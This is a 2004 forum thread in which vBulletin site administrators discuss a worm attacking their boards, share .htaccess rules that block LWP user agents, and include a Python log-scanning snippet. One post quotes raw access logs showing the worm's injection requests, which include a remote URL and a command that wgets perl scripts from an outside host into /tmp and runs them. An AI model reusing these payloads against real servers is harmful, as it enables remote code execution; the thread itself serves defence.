showthread attack attempt?

  • AWS
    Senior Member
    • Apr 2000
    • 1830
    • 5.2.x

    #16
    To view the coding right click the broken image and save it to disk. Rename it giving it .txt extension and then open it in any text editor.
    Admins Zone - Resources for Forum Administrators


    • Streicher
      Senior Member
      • Jan 2001
      • 373
      • 3.7.x

      #17
      It is easy to block them. Put the code of the attachment into .htaccess
      Attached Files
      Streicher


      • Floris
        Senior Member
        • Dec 2001
        • 37767

        #18
        I'll try that on my site as I now have more than 650 worms trying to exploit my vB haha


        • wock
          New Member
          • May 2004
          • 10

          #19
          Same happened to mine last night.
          Server admin has sent me a full log, don't know if it is of any use.
          Please talk to vbulletin about the following security hole in their system intruder got in last night thru your site the following way and uploaded files to the temp dir and driving load on server up.
          The vulnerability is in:
          save-concorde.org.uk/forums/printthread.php?t=1134/showthread.php?

          The hackers ip is 66.90.67.40, 64.191.63.149 etc


          Code:
          ###########################
          save-concorde.org.uk:64.191.63.149 - - [25/Dec/2004:09:03:27 -0500] "GET 
          /forums/printthread.php?t=1134/showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 4532 "-" "LWP::Simple/5.803"
          save-concorde.org.uk:66.90.67.40 - - [25/Dec/2004:09:09:07 -0500] "GET 
          /forums/printthread.php?t=1134/forumdisplay.php?f=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 4532 "-" "LWP::Simple/5.803"
          save-concorde.org.uk:66.90.67.40 - - [25/Dec/2004:09:09:07 -0500] "GET 
          /forums/printthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 11380 "-" "LWP::Simple/5.803"
          save-concorde.org.uk:66.90.67.40 - - [25/Dec/2004:09:09:07 -0500] "GET 
          /forums/printthread.php?t=1134/showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 4532 "-" "LWP::Simple/5.803"
          save-concorde.org.uk:69.44.56.140 - - [25/Dec/2004:09:10:02 -0500] "GET 
          /forums/printthread.php?t=1229/forumdisplay.php?f=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 3731 "-" "LWP::Simple/5.803"
          save-concorde.org.uk:69.44.56.140 - - [25/Dec/2004:09:10:03 -0500] "GET 
          /forums/printthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 11383 "-" "LWP::Simple/5.803"
          save-concorde.org.uk:69.44.56.140 - - [25/Dec/2004:09:10:03 -0500] "GET 
          /forums/printthread.php?t=1229/showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 3731 "-" "LWP::Simple/5.803"
          save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:19:55 -0500] "GET 
          /forums/printthread.php?t=907/printthread.php?t=907&pp=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 11197 "-" "LWP::Simple/5.65"
          save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:19:55 -0500] "GET 
          /forums/printthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 11383 "-" "LWP::Simple/5.65"
          save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:19:56 -0500] "GET 
          /forums/printthread.php?t=907/forumdisplay.php?f=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 11197 "-" "LWP::Simple/5.65"
          save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:19:56 -0500] "GET 
          /forums/printthread.php?t=907/showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 11197 "-" "LWP::Simple/5.65"
          save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:19:59 -0500] "GET 
          /forums/printthread.php?t=907/printthread.php?t=907&pp=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 11197 "-" "LWP::Simple/5.65"
          save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:20:02 -0500] "GET 
          /forums/printthread.php?t=907/forumdisplay.php?f=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 11197 "-" "LWP::Simple/5.65"
          Last edited by Jerry; Sun 26 Dec '04, 9:49am.


          • Scott MacVicar
            Former vBulletin Developer
            • Dec 2000
            • 13286

            #20
            Your admin doesn't know what he's talking about, it's a worm that's trying to attack ALL PHP scripts by attempting to pass a long string into ALL variables it can find. The problem is that on Google vBulletin is the most popular PHP link, so we're getting more attacks.

            If something actually wrote something to the tmp directory then it wasn't from vBulletin.

            Scott MacVicar

            My Blog | Twitter


            • mOdEtWo
              Senior Member
              • Dec 2003
              • 334
              • 3.7.x

              #21
              Originally posted by Streicher
              It is easy to block them. Put the code of the attachment into .htaccess
              Thank you, that fixed the problem for me. I don't have the worm/bots browsing the forums anymore.

              meow


              • eclectica
                Senior Member
                • Sep 2003
                • 334
                • 3.6.x

                #22
                I've had these unusual bots going through just the archives of the forum and turned them off until I learned more. They all had user agents like lwp-trivial/1.41 or LWP::Simple/5.803

                Here's a typical link they are hitting in the archives:


                • Alcar
                  Member
                  • Aug 2002
                  • 58
                  • 3.6.x

                  #23
                  So they aren't actually a threat, as vBulletin is secure in this particular manner?

                  I hate having to use HTACCESS for anything much other than disabling directory viewing.

                  Alcar...
                  http://www.oddworldforums.net


                  • ManagerJosh
                    Senior Member
                    • Jun 2002
                    • 9922

                    #24
                    what's happening is these worms are trying every variable they can find and attempting to exploit them Alcar.

                    the .HTACCESS is merely to jam up the bots from bombarding and overwhelming your server. It won't affect your users.
                    ManagerJosh, Owner of 4 XenForo Licenses, 1 vBulletin Legacy License, 1 Internet Brands Suite License
                    Director, WorldSims.org | Gaming Hosting Administrator, SimGames.net, Urban Online Entertainment


                    • ManagerJosh
                      Senior Member
                      • Jun 2002
                      • 9922

                      #25
                      Just an FYI for those who are blocking by IP, I caught these guys running around my site..


                      67.15.52.18
                      LWP::Simple/5.803
                      69.93.114.234
                      LWP::Simple/5.65
                      81.4.64.206
                      LWP::Simple/5.63
                      66.98.172.100
                      LWP::Simple/5.65
                      66.98.152.87
                      LWP::Simple/5.65
                      69.93.114.234
                      LWP::Simple/5.65
                      ManagerJosh, Owner of 4 XenForo Licenses, 1 vBulletin Legacy License, 1 Internet Brands Suite License
                      Director, WorldSims.org | Gaming Hosting Administrator, SimGames.net, Urban Online Entertainment


                      • digitalpoint
                        Senior Member
                        • Mar 2004
                        • 2573
                        • 4.1.x

                        #26
                        Can't really be done by IP address since any exploited box will do it.

                        Yesterday morning when I saw it happening, I also blocked it with a quick .htaccess entry, which worked. In case anyone couldn't get it to work with the one posted for whatever reason, this is what I'm using:

                        Code:
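                        # Return 403 Forbidden to any client whose User-Agent begins with "LWP".
                        # [NC] makes the match case-insensitive, so one condition covers LWP and lwp.
                        RewriteEngine on
                        RewriteCond %{HTTP_USER_AGENT}  ^lwp [NC]
                        RewriteRule  .*      - [F]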
                        Sphinx Search for vBulletin 4: https://marketplace.digitalpoint.com...tin-4.870/item
                        Someone send me a message on Twitter when this site is usable again. https://twitter.com/digitalpoint
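
An added example (not code from any poster in this thread): a small Python check over access-log lines in the format wock posted, flagging requests by their shape (a URL or command separators inside a query value) as well as by the LWP user agent that the .htaccess rule keys on. The sample lines, host names and addresses are constructed.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# vhost:client - - [time] "METHOD target PROTO" status bytes "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<vhost>[^:\s]+):(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)
REMOTE_URL = re.compile(r'(?:https?|ftp)://', re.I)   # URL where an id belongs
SHELL_CHAIN = re.compile(r'[;|`]|\$\(')               # command separators

def classify(line):
    """Return (ip, status, reasons) for one log line, or None if unparsable."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    reasons = []
    if m['ua'].lower().startswith('lwp'):
        reasons.append('ua:lwp')
    # Split on '&' only, so a ';' inside a value stays part of that value.
    for pair in urlsplit(m['target']).query.split('&'):
        name, _, value = pair.partition('=')
        value = unquote_plus(value)
        if REMOTE_URL.search(value):
            reasons.append('remote-url:' + name)
        if SHELL_CHAIN.search(value):
            reasons.append('shell-chain:' + name)
    return m['ip'], int(m['status']), reasons

def scan(lines):
    """Keep only the lines that tripped at least one rule."""
    hits = [classify(line) for line in lines]
    return [h for h in hits if h and h[2]]

# Constructed sample lines (documentation addresses and hosts, not real traffic).
SAMPLE = [
    'forum.example:192.0.2.10 - - [25/Dec/2004:09:03:27 -0500] "GET /forums/printthread.php?t=1134/showthread.php?t=http://host.invalid/x.gif?&cmd=echo%20a;echo%20b HTTP/1.1" 200 4532 "-" "LWP::Simple/5.803"',
    'forum.example:198.51.100.7 - - [25/Dec/2004:09:09:07 -0500] "GET /forums/printthread.php?t=1134/showthread.php?t=http://host.invalid/x.gif?&cmd=echo%20a;echo%20b HTTP/1.1" 200 4532 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"',
    'forum.example:198.51.100.9 - - [25/Dec/2004:09:10:02 -0500] "GET /forums/showthread.php?t=1134&page=2 HTTP/1.1" 200 11380 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"',
    'forum.example:203.0.113.5 - - [25/Dec/2004:09:19:55 -0500] "GET /forums/forumdisplay.php?f=2 HTTP/1.1" 403 210 "-" "lwp-trivial/1.41"',
]

if __name__ == '__main__':
    for ip, status, reasons in scan(SAMPLE):
        print(ip, status, ', '.join(reasons))
```

The second sample line has the same request shape without an LWP agent, which a user-agent rule alone would let through; the fourth is an ordinary LWP client that the same rule refuses.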


                        • Marc Smith
                          Senior Member
                          • Aug 2001
                          • 510
                          • 3.6.x

                          #27
                          Also see http://www.vbulletin.com/forum/showthread.php?t=124244

                          Several of us have been seeing this.


                          • cirisme
                            Senior Member
                            • Feb 2003
                            • 1310
                            • 3.0.7

                            #28
                            Hmmm, so that's why our long-standing (year and a half, or thereabouts) Most users ever online was broken yesterday. Saw a bunch of LWP'ers on WOL so I banned the lot.

                            Thanks for the info, all.
                            TheologyWeb. We debate theology. srsly.


                            • boro_boy
                              Senior Member
                              • Dec 2002
                              • 376
                              • 3.8.x

                              #29
                              Originally posted by Streicher
                              It is easy to block them. Put the code of the attachment into .htaccess
                              I applied this and the bots are slowly but surely reducing in number.
                              My Football Forum


                              • boro_boy
                                Senior Member
                                • Dec 2002
                                • 376
                                • 3.8.x

                                #30
                                Yeah, they have all gone now. Thank you very much.
                                My Football Forum
